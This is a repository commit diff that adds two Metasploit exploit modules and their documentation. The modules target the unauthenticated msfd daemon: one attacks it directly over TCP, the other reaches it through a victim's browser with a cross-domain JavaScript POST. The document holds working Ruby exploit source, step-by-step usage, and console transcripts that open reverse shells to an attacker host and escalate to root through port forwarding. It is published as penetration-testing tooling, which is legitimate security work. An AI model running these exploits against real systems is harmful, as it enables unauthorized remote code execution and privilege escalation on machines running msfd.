Land #9908, msfd_rce_remote and msfd_rce_browser
parent
82fc4aba64
commit
c4bca03fea
|
@ -0,0 +1,99 @@
|
|||
## Description
|
||||
|
||||
This module connects to the Metasploit msf daemon and uses the ruby interpreter
|
||||
to achieve a shell. This module can be used when the vulnerable service is only
|
||||
listening on localhost and the attacker has not achieved a foothold on the
|
||||
machine. To achieve code execution, the data is sent from the victim's browser.
|
||||
To achieve this, the victim must visit the attacker's web site.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
|
||||
of providing remote access. The msf daemon provides no means of authentication
|
||||
and is therefore vulnerable against an attacker who has IP access to the daemon.
|
||||
In those cases where the daemon is listening on localhost, we take advantage of
|
||||
the fact that the victim's web browser has IP access to the daemon.
|
||||
|
||||
Because the msfconsole-program is line-based, it is possible to successfully
|
||||
send commands through the HTTP-protocol. This module takes advantage of this by
|
||||
placing the msfconsole-command in the POST-data of a HTTP-request. Since these
|
||||
POST-requests are considered safe to send cross-domain, it is possible to send
|
||||
them from the attacker's web application and to localhost using the victim's
|
||||
browser.
|
||||
|
||||
All versions of Metasploit are affected by this module, however testing has only
|
||||
been performed on the following targets:
|
||||
|
||||
* Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)
|
||||
* Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and
|
||||
Chrome)
|
||||
|
||||
***NB!*** Exploitation on Windows had a higher degree of success, when the
|
||||
quiet-flag was sent to the msf daemon. On Linux, it made no difference.
|
||||
|
||||
Source code and installers:
|
||||
|
||||
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
|
||||
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start the vulnerable service `msfd -q -f`
|
||||
2. Start `msfconsole`
|
||||
3. Do: `use exploit/multi/browser/msfd_rce_browser`
|
||||
4. Do: `set REMOTE_IP [IP]` (default: `127.0.0.1`)
|
||||
5. Do: `set RPORT [PORT]` (default: `55554`)
|
||||
6. Do: `set PAYLOAD [PAYLOAD]`
|
||||
7. Do: `exploit`
|
||||
8. Do: Visit the listed URL from the victim's machine
|
||||
9. You should get a shell
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
Options unique for this module is described below.
|
||||
|
||||
**REMOTE_IP**
|
||||
|
||||
IP to target when running inside the victim's browser.
|
||||
|
||||
**REMOTE_PORT**
|
||||
|
||||
Remote port the vulnerable service is running at, default is 55554.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Through the victim's browser
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/browser/msfd_rce_browser
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
|
||||
payload => ruby/shell_reverse_tcp
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
|
||||
lhost => 192.168.0.17
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443
|
||||
lport => 443
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > exploit
|
||||
[*] Exploit running as background job 0.
|
||||
|
||||
[-] Handler failed to bind to 192.168.0.17:443:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:443
|
||||
msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
|
||||
http://0.0.0.0:8080/J5ras6oYftFWW4
|
||||
[*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
|
||||
[*] Server started.
|
||||
```
|
||||
|
||||
Visit the web site listed in a browser on the victim's machine and you should
|
||||
get the output below.
|
||||
|
||||
```
|
||||
[*] 192.168.0.17 msfd_rce_browser - 192.168.0.17 msfd_rce_browser
|
||||
Sending HTML...
|
||||
[*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
|
||||
id
|
||||
[*] exec: id
|
||||
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
|
@ -0,0 +1,106 @@
|
|||
## Description
|
||||
|
||||
This module connects to the Metasploit msf daemon and uses the ruby interpreter
|
||||
to achieve a shell. This module can target remote systems if the daemon is
|
||||
exposed on a remote interface or it can be used for privilege escalation when
|
||||
the attacker has a foothold. If used as privilege escalation, port forwarding
|
||||
must be set up.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Metasploit](https://github.com/rapid7/metasploit-framework) has a legacy method
|
||||
of providing remote access. The msf daemon provides no means of authentication
|
||||
and is therefore vulnerable against an attacker who has IP access to the daemon.
|
||||
|
||||
All versions of Metasploit are affected by this module, however testing has only
|
||||
been performed on the following targets:
|
||||
|
||||
* Metasploit 5.0.0 on Ubuntu 16.04
|
||||
* Metasploit 4.16.51 on Windows 7
|
||||
|
||||
Source code and installers:
|
||||
|
||||
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
|
||||
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start the vulnerable service: `msfd -f -q -a 0.0.0.0`
|
||||
2. Start `msfconsole`
|
||||
3. Do: `use exploit/multi/misc/msfd_rce_remote`
|
||||
4. Do: `set RHOST [IP]`
|
||||
5. Do: `set RPORT [PORT]` (default: `55554`)
|
||||
6. Do: `set PAYLOAD [PAYLOAD]`
|
||||
7. Do: `exploit`
|
||||
8. You should get a shell
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**RHOST**
|
||||
|
||||
Remote Host
|
||||
|
||||
**RPORT**
|
||||
|
||||
Remote port the vulnerable service is running at, default is 55554.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Remote target
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/misc/msfd_rce_remote
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 192.168.56.101
|
||||
rhost => 192.168.56.101
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set payload ruby/shell_reverse_tcp
|
||||
payload => ruby/shell_reverse_tcp
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set lhost 192.168.0.17
|
||||
lhost => 192.168.0.17
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set lport 443
|
||||
lport => 443
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
|
||||
|
||||
[-] Handler failed to bind to 192.168.0.17:443:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:443
|
||||
[*] Command shell session 1 opened (172.17.0.2:443 -> 192.168.0.17:48152) at 2018-04-22 18:43:41 +0000
|
||||
|
||||
whoami
|
||||
robin
|
||||
```
|
||||
|
||||
|
||||
### Local target - privilege escalation
|
||||
|
||||
```
|
||||
meterpreter > getuid
|
||||
Server username: uid=1000, gid=1000, euid=1000, egid=1000
|
||||
meterpreter > shell
|
||||
Process 17366 created.
|
||||
Channel 1 created.
|
||||
netstat -lntup|grep 55554
|
||||
(Not all processes could be identified, non-owned process info
|
||||
will not be shown, you would have to be root to see it all.)
|
||||
tcp 0 0 127.0.0.1:55554 0.0.0.0:* LISTEN -
|
||||
ps aux | grep msfd
|
||||
root 17303 3.3 13.8 535168 283492 pts/18 Sl+ 20:47 0:08 ruby ./msfd -f -q
|
||||
^C
|
||||
Terminate channel 1? [y/N] y
|
||||
meterpreter > portfwd add -l 55554 -p 55554 -r 127.0.0.1
|
||||
[*] Local TCP relay created: :55554 <-> 127.0.0.1:55554
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 2...
|
||||
msf5 > use exploit/multi/misc/msfd_rce_remote
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > set rhost 127.0.0.1
|
||||
rhost => 127.0.0.1
|
||||
msf5 exploit(multi/misc/msfd_rce_remote) > exploit
|
||||
|
||||
[-] Handler failed to bind to 192.168.0.17:443:- -
|
||||
[*] Started reverse TCP handler on 0.0.0.0:443
|
||||
[*] Command shell session 3 opened (172.17.0.2:443 -> 192.168.0.17:48300) at 2018-04-22 18:55:19 +0000
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
|
@ -0,0 +1,77 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Metasploit msfd Remote Code Execution via Browser',
|
||||
'Description' => %q{
|
||||
Metasploit's msfd-service makes it possible to get a msfconsole-like
|
||||
interface over a TCP socket. This module connects to the msfd-socket
|
||||
through the victim's browser.
|
||||
|
||||
To execute msfconsole-commands in JavaScript from a web application,
|
||||
this module places the payload in the POST-data. These POST-requests
|
||||
can be sent cross-domain and can therefore be sent to localhost on the
|
||||
victim's machine. The msfconsole-command to execute code is 'rbi -e
|
||||
"CODE"'.
|
||||
|
||||
Exploitation when the browser is running on Windows is unreliable and
|
||||
the exploit is only usable when IE is used and the quiet-flag has been
|
||||
passed to msf-daemon.
|
||||
},
|
||||
'License' => BSD_LICENSE,
|
||||
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
|
||||
'Platform' => 'ruby',
|
||||
'Arch' => ARCH_RUBY,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {}],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 8192, # Arbitrary limit
|
||||
'DisableNops' => 'True',
|
||||
'BadChars' => "\x22\x0a"
|
||||
},
|
||||
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
|
||||
OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
super
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
|
||||
sc = payload.encoded
|
||||
shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
|
||||
var1 = rand_text_alpha(rand(6..11))
|
||||
var2 = rand_text_alpha(rand(6..11))
|
||||
html = <<-EOS
|
||||
<html>
|
||||
<head></head>
|
||||
<body>
|
||||
<script>
|
||||
var #{var1} = new XMLHttpRequest();
|
||||
#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
|
||||
var #{var2} = String("#{shellcode}");
|
||||
#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
print_status("#{msg} Sending HTML...")
|
||||
send_response(cli, html, { 'Content-Type' => 'text/html' })
|
||||
end
|
||||
end
|
|
@ -0,0 +1,66 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Metasploit msfd Remote Code Execution',
|
||||
'Description' => %q{
|
||||
Metasploit's msfd-service makes it possible to get a msfconsole-like
|
||||
interface over a TCP socket. If this socket is accessible on a remote
|
||||
interface, an attacker can execute commands on the victim's machine.
|
||||
|
||||
If msfd is running with higher privileges than the current local user,
|
||||
this module can also be used for privilege escalation. In that case,
|
||||
port forwarding on the compromised host can be used.
|
||||
|
||||
Code execution is achieved with the msfconsole command: irb -e 'CODE'.
|
||||
},
|
||||
'Author' => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
|
||||
'License' => BSD_LICENSE,
|
||||
'Platform' => "ruby",
|
||||
'Arch' => ARCH_RUBY,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 8192, # Arbitrary limit
|
||||
'BadChars' => "\x27\x0a",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Apr 11 2018', # Vendor notification
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(55554)
|
||||
])
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
data = sock.get_once
|
||||
if data.include?("msf")
|
||||
disconnect
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
disconnect
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
sock.get_once
|
||||
sock.put "irb -e '" + payload.encoded + "'\n"
|
||||
disconnect
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue